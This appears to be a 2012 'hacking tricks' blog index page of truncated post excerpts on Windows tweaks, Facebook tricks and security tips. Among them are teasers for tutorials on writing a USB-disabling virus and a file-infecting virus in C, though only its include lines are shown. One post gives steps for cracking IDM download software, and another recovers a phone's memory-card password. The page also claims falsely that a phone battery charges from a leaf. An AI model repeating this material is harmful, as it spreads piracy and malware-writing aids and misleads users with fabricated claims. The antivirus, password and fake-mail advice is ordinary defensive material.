Sunday, 23 December 2012

The magic number trick just like any other facebook trick, allows a user to generate some sort of a code to tag the title of an intended page or group. But now it seems like some facebook are now using the same trick as a spammy way of advertising their facebook pages and groups. Viewed from a real perspective, these magic numbers are nothing but a unique ID number of  facebook Users, Pages or Groups. How it...

Friday, 21 December 2012

1) Make New Folder And Name it what You want.. 2) Now open that Folder and Right click in that 3) Now goto New > Text Document 4)Now Name it Lock.txt Now copy and paste following Code in that notepad Quote: cls@ECHO OFFtitle Folder Privateif EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCKif NOT EXIST Private goto MDLOCKER:CONFIRMecho Are you sure you want to lock the folder(Y/N) (By www.patelsanjit.blogspot.com)set/p "cho=>"if %cho%==Y goto LOCKif %cho%==y goto LOCKif %cho%==n goto ENDif %cho%==N...

1. Start regedit ie; Start->Run->regedit 2. Navigate to HKEY_CLASSES_ROOT\lnkfile              If you find difficult in reaching this file location, simply Press Ctrl+F to open find window. Enter "IsShortcut" and click find. now Press f3 till you get the file Inkfile located at Hkey_Classes_Root\Inkfile 3. Delete the IsShortcut registry value. You may need to restart Windows X...

If You are Regular or often User of Computer you will have Heard or see about Resolution about Desktop Screen or laptop Screen. This screen's Resolution's Real meaning is as below. Resolution Size and Full-Form VGA- Video Graphic Array (640 X 480) SVGA - Super Video Graphic Array (800 X 600) XGA - eXtended Graphic Array (1024 X 768) SXGA - Super eXtended Graphic Array (1280 X 1024) UXGA - Ultra eXtended Graphic Array (1600 X 1200) Now after reading the above Secrets you can choose your own resolution without any Experts help. hackhours.blogspot.com ...

Facts About Bill Gates 1. Bill Gates earns US$250 every SECOND, that's about US$20 Million a DAY and US$7.8 Billion a YEAR! 2. If he drops a thousand dollar, he won't even bother to pick it up bcoz the 4 seconds he picks it, he would've already earned it back. 3. The US national debt is about 5.62 trillion, if Bill Gates were to pay the debt by himself; he will finish it in less then 10 years. 4. He can donate US$15 to everyone on earth but still be left with US$5 Million for his pocket money. 5. Michael Jordan is the highest paid athlete...

Hey Guys.. This is Rahul Patil... and I am back with my New trick.. Create a Send to Menu Shortcut.. Now send any file to your Folder directly via Send to Menu... Follow the Steps... First you’ll need access to hidden files. So change your view settings to make all hidden files visible. In My Computer.. Tools -> folder options -> view (tab) and select the show hidden files and folders. go to parent drive:/documents...

Malware, short for malicious software, is software designed to secretly access a computer system without the owner's informed consent. The expression is a general term used by computer professionals to mean a variety of forms of hostile, intrusive, or annoying software or program code.The term "computer virus" is sometimes used as a catch-all phrase to include all types of malware, including true viruses. [Wikipedia] With the increase in malware "programmers", numerous malwares/spywares are releasing everyday. Here are some ways to stay...

My friend recently bought a Toshiba laptop, but it was stolen within a couple days. The good thing is that i had installed a tracing software on his laptop the very same day he bought it, and he had no troubles finding it. This can happen to anyone which is using laptop, so having a tracing software installed on your laptop is not a bad idea. Here i am showing you a free laptop tracing software called Prey. Prey lets you keep track of your...

How to Detect Fake Mails: 1. Lets get back to the example I illustrated in my article Fake Mailer. I had used "support@gmail.com" as the sender email address. No doubt, this was fake and the receiver will get the fake email sent by me. 2. Suppose you are the receiver. Now, I will tell you how to recognize this mail as fake. Open the email and hit on "Show Details". 3. Something you must know:  Whenever Google sends you any email, the...

we all know that a slow internet connection really costs time and makes feel annoying . many friends ask me the ways to increase their internet speed.however . it's possible to do to some extent and make your internetmuch better then it was in the past.There are Two tricks that will help you to increase your internet speed.. First Method- Speed Up Your Net Speed By 20% 1. First you go to start button 2. Go To Run 3. Type gpedit.msc...

Thursday, 20 December 2012

BATTERY CHARGING TRICK

Now reacharge your mobile with a leaf atteach with leaf of your mobile battery few mintes your mobile battery will be charged EnJoY!!! TIP:-TOUCH THE LEAF ONLY IN THE -&+ PANEL AS IN THE PICTU...

TRACE MOBILE NUMBER

TRACE MOBILE NUMBER 1 TRACE MOBILE NUMBER 2 TRACE MOBILE NUMBER 3 TRACK IM...

-Insert the memory card, dont access yet through your phone. -Open file explorer and locate c: system Look for a file named MMCSTORE. -Rename this file to mmcstore.txt -Copy the file mmcstore.txt and send it to your computer -Now open that file in notepad - When you are finished you would find the password there....... £nj...

SOCIAL NETWORKING SECURITY TIPS

Security tips:-If you are using social networking sites 1.If you use your email id with facebook,orkut etc make sure that your mail id and facebook,orkut password is not same 2.Use temporary email for social networking sites-if you use facebook or other social networking sites then you must use a temporary email id.For your important work purpose usf personal mail id 3.Security Question-when ever you register on any site you have to fill the security question for recovery purpose.Some security question like"whats ur moms birth place" etc so...

1. Insert the memory card to your PC 2. Keep a back up of all the data from the memory card, because first you have to format the card 3. Download and install Skymedi software go to http://4shared.com/rar/Uh1p_sxF/Skymedi_2GB_Fix__alltrickszone.html?cau2=403tNull 4. After installation, the application will launch automatically showing a windows with options ¡° Fix ¡± and ¡° Cancel ¡±. From the drop down menu, you have to browse the memory card 5. Once you select the location of the card, click on ¡° Fix ¡±, it willask you for the confirmation,...

How to Use Multiple Facebook Accounts in Google Chrome *.Firstly open Google Chrome and login into your first Facebook Account. *.Then right click on the Facebook home link present at the top left corner and click on open link in incognito window. *.That's all, you are done! Now a new window will appear asking you to login into your Facebook account. So, it is really simple in Google Chrome to do so !...

Facebook is always at the top of Hacker’s list due to its large popularity, ease to use, connects large number of people,  large collection of applications, many more. Facebook was launched in 2004, as of January 2011, it had more than 600 million active user. A hacker can get many useful information about anyone with Hacking his or her Facebook Account and can destroy anyones social life with it. Due to large number of attacks...

1.   Use protection software "anti-virus software" and keep it up to date. Make sure you have anti-virus software on your computer! Anti-virus software is designed to protect you and your computer against known viruses so you do not have to worry. But with new viruses emerging daily, anti-virus programs need regular updates, like annual flu shots, to recognize these new viruses. Be sure to update your anti-virus software regularly! The more often you keep it updated, say once a week, the better. Check with the web site of your...

see the magic.

 copy the below and past it in chat window and see the magic: [[501234119909794]] [[501234133243126]] [[501234126576460]] [[501234129909793]] [[501234123243127]] [[501234263243113]] [[501234269909779]] [[501234273243112]] [[501234266576446]] [[501234276576445]] [[501234423243097]] [[501234429909763]] [[501234439909762]] [[501234436576429]] [[501234433243096]] [[501234559909750]] [[501234563243083]] [[501234569909749]] [[501234573243082]] [[501234576576415]] [[501234829909723]] [[501234843243055]] [[501234833243056]] [[501234836576389]]...

Here’s how you change the title text that appears at the top of the Messenger window. By default, this is “Yahoo! Messenger”, followed by your status. Simply edit the ymsgr.ini file, which you will find in the same folder as the Messenger program, in your Program Files folder. Locate the file and open it in Notepad. Then, at the end, add the following: [APP TITLE] caption=YOUR TEXT Here, “YOUR TEXT” is whatever you want in the...

Yes it is possible to change Adminstrator password both in Win XP and Vista without knowing it. If you somehow manage to login as an Administrator then you can change the password without knowing it. Here’s the Step-By-Step instructions 1. Right-click on the “My Computer” icon on the desktop OR in the Start Menu. 2. Select the option “Manage”. 3. On the left pane expand the “Computer Management (Local) tree (if it is not already...

Windows has a nice new Start menu, which you can customize more thoroughly than you could with the Start menu in any earlier version of Windows. Open the Taskbar And Start Menu Properties dialog box by right-clicking the taskbar and clicking Properties. On the Start Menu tab, select either the Start Menu option or the Classic Start Menu option to choose which version of the Start menu to use, and then click Customize. The Customize...

In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program. Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll...

How would you like to change the logon screen background in Windows 7 so as to give your Windows a customized look and feel? With a small tweak it is possible to customize the Windows 7 logon screen and set your own picture/wallpaper as the background. Changing logon screen background in Windows 7 is as simple as changing your desktop wallpaper. Well here is a step by step instruction to customize the logon screen background. 1....

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.   #include<stdio.h> #include<io.h> #include<dos.h> #include<dir.h> #include<conio.h> #include<time.h>...

Wednesday, 19 December 2012

1. First You Download IDM Cracker Tool.2. Now Run IDM Cracker Tool3. Now if you want to install the latest version of idm then first you need to hit on the update button and your idm will be automatically updates in to the latest version . 4. After Your IDM is Updates To The Latest Version . Just You Hit on the start button and it will start cracking your idm software within few seconds . and now your idm convert in full version .That's...

Our pcs and also email messages tend to be what we use on an every day basis in order to connect with others, so there is no uncertainty we have to discover ways to safeguard each of our pcs along with e-mail. On earth of insane individuals, you’ll find dozens of people who’re usually on the verge of coughing another woman’s email or even computer. Your work is to stay away from these people by making passwords that will other folks cannot...

There are a number of ways in which a hacker can get your passwords. The most common is a "brute force attack", in which a hacker simply slams a website with thousands of possible passwords for an account until one is accepted. In a brute force hacking attack, three simple character changes is the difference between 2.23 hours and 2.21 years to crack your password. For a standard 7 letter password with just lower case letters, there are 8,031,810,176 possible combinations. That may seem like a lot, yet it would only take 2.23 hours to...

A new social networking worm in the vein of Koobface is currently doing the rounds. Unlike the majority of Facebook scams, this one actively infects your computer with malware instead of simply tricking you into taking surveys and passing on messages to other users. The link in his Facebook chat from a friend pointed to an app.facebook.com/CENSORED link. Typically when you go to a Facebook app page it prompts you to add the application and grant...

Domain typo-squatting is commonly used to spread malware to users whom accidentally misspell a legitimate domain in their web browser. A new type of domain typo-squatting takes advantage of an omission instead of a misspelling. A Doppelganger Domain is a domain spelled identical to a legitimate fully qualified domain name (FQDN) but missing the dot between host/subdomain and domain, to be used for malicious purposes. Doppelganger Domains...

Vulnerabilities are everywhere. Knowing where they are is useful, but knowing which one will be exploited is much more useful. Security professionals need to focus on real threats plaguing today’s practitioners and provide up-to-date statistics on actual attack data. As part of its ongoing Hacker Intelligence Initiative (HII), Imperva monitors malicious online activity to help organizations understand the threat landscape. During a six month period from June 2011-November 2011, Imperva researched and analysed web attack traffic targeted...

Detects and protects from all kinds of ARP (Address Resolution Protocol) related attacks in Wi-Fi networks, like DOS (Denial Of Service) or MITM (Man In The Middle) Attack. Protects your phone from tools like FaceNiff, Cain & Abel, ANTI, ettercap, DroidSheep, NetCut, and all others that try to hijack your session via MITM through ARP spoofing / ARP poisoning. Features: – Uses very few resources – Uses no resources if Wi-Fi is disabled –...

How to remove Recycle Bin Icon from Desktop If using XP Pro Go to START > RUN Type GPEDIT.MSC Navagate to USER CONFIGURATION >ADMINISTRATIVE TEMPLATES >Click on DESKTOP, On the right hand pane find ” Remove Recycle Bin icon on the desktop ” , double left click on it to ENABLE it. Sorted! If using XP Home Create or modify the following registry entry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel {645FF040-5081-101B-9F08-00AA002F954E} REG_DWORD 0×000000...

Folder Lock With Password Without Any Software- Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat'). Any name will do. Then you see a batch file. Double click on this batch file to create a folder locker. New folder named 'Locker' would be formed at the same location. Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'. If you want to unlock your files,double click ...

-: Creating IM Bot :-

This quick tutorial will show you how to develop your own functional IM bot that works with Google Talk, Yahoo! Messenger, Windows Live and all other popular instant messaging clients. To get started, all you need to know are some very basic programming skills (any language would do) and web space to host your “bot”. For this example, I have created a dummy bot called “insecure” ...

FireFox Keyboard Shortcuts Press CTRL + L to directly go to the address bar. To copy URL of websites from address bar Simply single click on the URL, this will select the whole address, then use CTRL + C for copying and CTRL + V for pasting. Press Spacebar to scroll down the page. Press Shift + Spacebar for quickly scrolling up. Use CTRL + T to open a New Tab Use CTRL + W to close the Tab If you use certain website more frequently bookmark...